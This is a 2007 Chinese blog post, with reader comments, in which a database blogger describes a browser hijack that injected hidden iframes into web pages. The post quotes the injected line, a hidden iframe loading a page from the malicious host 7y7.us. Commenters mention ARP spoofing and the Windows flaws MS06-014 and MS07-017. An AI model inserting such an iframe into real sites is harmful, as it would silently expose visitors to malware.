« ChinaCache(北京蓝汛)招聘DBA | Blog首页 | DBA Scripts:获得跟踪文件名称的gettrcname.sql »
有多少病毒可以再来-记大战7y7.us
作者:eygle |【转载时请务必以超链接形式标明文章原始出处和作者信息及本声明】链接:http://www.eygle.com/archives/2007/05/7y7us_virus.html
今天莫名其妙的就感染了一个病毒,恩,确切的说,是半个病毒。
Norton根本没有报病毒,但是我已经发现了问题,而其他同时的病毒防护却是不停的在报警。
报告的病毒是Trojan.Anicmoo,而我的计算机主要问题在于浏览器被"劫持"
在浏览网页时,部分网页被嵌入了一层iframe,代码如下:
<iframe style='display:none' src=http://7y7.us/1.htm></iframe>
在Google中发现了很多类似的报告,有人说firefox可以免疫,但是我的firefox同样中招,而且网上给出的解决方案一律无效。
这是我重装机器以来第一次这么迅速的被病毒感染。
尝试了很多方法,一律无效,于是干脆我选择放弃了,用Word总没问题吧。
恩,于是重新修订了新书的第一章。
结果,17:00左右,同事报告,病毒走了。
倒,什么叫走了?
我打开IE一看,果然好了。
原来这个病毒可能是定时的?
有人遇到过这个病毒没有?这个7y7.us在网上有很多案例,但是已有的解决方案在我这里都没有用,还有谁曾经和这个问题战斗过么?交流一点经验。
-The End-
By eygle on 2007-05-14 17:17 | Comments (14) | Posted to Windows | Edit |Pageviews:
| 相关文章 | 随机文章 |
|
|
深入理解数据库创建-补遗 奥运会、抵制 与 anti-cnn 2008 新年快乐 控制文件的SECTION 11是什么? Xp中关闭移动硬盘/U盘自动播放的方法 |
留言 (14)
第一次听说还有自己来自己走的病毒!
Posted by: ruochen0926 at May 14, 2007 9:20 PM
我家里的机器现在都是用ghost,一有病毒就恢复,一两分钟就好^_^现在浏览器下载漏洞太多,经常去一些搜索出来的网站时中招,每次清理要该一堆的注册表,不胜其烦
Posted by: NinGoo at May 14, 2007 9:25 PM
这个所谓的病毒只是感染web服务器,是你公司的代理服务器中招了,所有通过这个代理访问web的机器都会出现你说的现象。
Posted by: zhangyong at May 15, 2007 8:48 AM
不会代理中招,我们的代理是Linux服务器,而且并非所有机器都有问题。
Posted by: eygle at May 15, 2007 10:50 AM
这中病毒我也遇到过,但没杀就好了,不知道为什么
Posted by: Rumsfeld at May 15, 2007 11:19 AM
推荐使用卡巴斯基进行处理,我的电脑五一前中招,搞了两天,然后彻底重做了。重装之后,按照常龙的推荐使用卡巴斯基,目前看来很好。
Posted by: qinminglei at May 15, 2007 11:35 AM
有人装了卡巴也不管用,我还是Norton吧。
Posted by: eygle at May 15, 2007 11:46 AM
电脑随便借给同事用,不安全啊
Posted by: jacky at May 15, 2007 2:17 PM
这个病毒会进行ARP欺骗,进而影响局域网的其它机器,病毒是利用MS06-014 ,MS07-017系统漏洞来攻击的!病毒自走自来可能是中毒的主机关机了,产生不了ARP欺骗包!!!所以.....
Posted by: bobhe2007 at May 16, 2007 12:28 PM
这个病毒会进行ARP欺骗,进而影响局域网的其它机器,病毒是利用MS06-014 ,MS07-017系统漏洞来攻击的!病毒自走自来可能是中毒的主机关机了,产生不了ARP欺骗包!!!所以.....
Posted by: bobhe2007 at May 16, 2007 12:30 PM
http://hi.baidu.com/czkuka/blog/item/911517b32399dca6d8335a66.html
我公司网络也碰到这个问题,写一点解决的办法
Posted by: kuka at May 16, 2007 2:59 PM
木马的倾向,主叫关闭,然后就停了
Posted by: ricky at May 16, 2007 4:46 PM
其实 我说了 那种 病毒我能解决的 你不用重的撒 呵呵 真的可以 我在我的研究所 就是负责网络安全的撒
Posted by: 柯星 at May 18, 2007 4:41 PM
还有这样的病毒……
挥一挥衣袖,不带走一个文件~
Posted by: 溜达溜达 at May 19, 2007 8:44 PM
